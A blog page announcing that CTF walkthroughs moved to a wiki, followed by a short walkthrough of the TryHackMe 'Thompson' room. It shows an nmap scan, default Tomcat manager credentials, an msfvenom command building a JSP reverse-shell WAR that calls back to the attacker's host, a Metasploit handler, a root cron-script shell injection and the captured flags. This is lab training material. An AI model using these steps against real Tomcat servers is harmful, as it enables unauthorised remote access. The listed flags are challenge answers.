Last Updated:
ctf walkthroughs
capture the flag walkthroughs

Where are all of the CTF Walkthroughs?

I moved the "non-blog" material.

So, I moved most of the "Capture the Flag walkthrough" material over to a wiki, powered by MediaWiki. I figured the wiki format is designed to make information like that easily accessible. It provides a place for there to be tons and tons of articles that aren't necessarily related, without the need for something like a menu to navigate or going back to Google search for the content.

Here's a more recent CTF walkthrough, since you may have expected that content here. Again, this one is duplicated over on the Wiki, where the rest of them now reside.

[Thompson] - TryHackMe

You can find this guide to the [Thompson] room on TryHackMe.com duplicated over on the MediaWiki, for example.

boot2root machine for FIT and bsides guatemala CTF

[Thompson] - TryHackMe
Thompson room on TryHackMe.com


Enumeration:

Nmap scan report for 10.10.238.164
Host is up, received echo-reply ttl 61 (0.099s latency).
Scanned at 2022-04-06 03:06:05 EDT for 19s
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fc052481987eb8db0592a6e78eb02111 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL+0hfJnh2z0jia21xVo/zOSRmzqE/qWyQv1G+8EJNXze3WPjXsC54jYeO0lp2SGq+sauzNvmWrHcrLKHtugMUQmkS9gD/p4zx4LjuG0WKYYeyLybs4WrTTmCU8PYGgmud9SwrDlEjX9AOEZgP/gj1FY+x+TfOtIT2OEE0Exvb86LhPj/AqdahABfCfxzHQ9ZyS6v4SMt/AvpJs6Dgady20CLxhYGY9yR+V4JnNl4jxwg2j64EGLx4vtCWNjwP+7ROkTmP6dzR7DxsH1h8Ko5C45HbTIjFzUmrJ1HMPZMo9ss0MsmeXPnZTmp5TxsxbLNJGSbDv7BS9gdCyTf0+Qq1
|   256 60c840abb009843d46646113fabc1fbe (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG6CiO2B7Uei2whKgUHjLmGY7dq1uZFhZ3wY5EWj5L7ylSj+bx5pwaiEgU/Velkp4ZWXM//thL6K1lAAPGLxHMM=
|   256 b5527e9c019b980c73592035ee23f1a5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIwYtK4oCnQLSoBYAztlgcEsq8FLNL48LyxC2RfxC+33
8009/tcp open  ajp13   syn-ack ttl 61 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open  http    syn-ack ttl 61 Apache Tomcat 8.5.5
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5

http://10.10.28.152:8080/manager/html

<user username="tomcat" password="s3cret" roles="manager-gui"/>

Log into /manager/html and notice you can upload JSP .war files.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.6.1.201 LPORT=4444 -f war -oset shell.war

Start msfconsole > user exploit/multi/handler > set PAYLOAD java/jsp_shell_reverse_tcp > set LHOST 10.6.1.201 > run

Click on the link to shell from the manage page and the user flag is in /home/jake/user.txt (your username will be tomcat)

Notice id.sh is /home/jake and is world read/write/execute.. also notice it's called by crontab every minute or so by user 'root', inject another reverse shell and you're root. Roof's flag is in /root/root.txt


user.txt

39400c90bc683a41a8935e4719f181bfc

root.txt

d89d5391984c0450a95497153ae7ca3a

Comments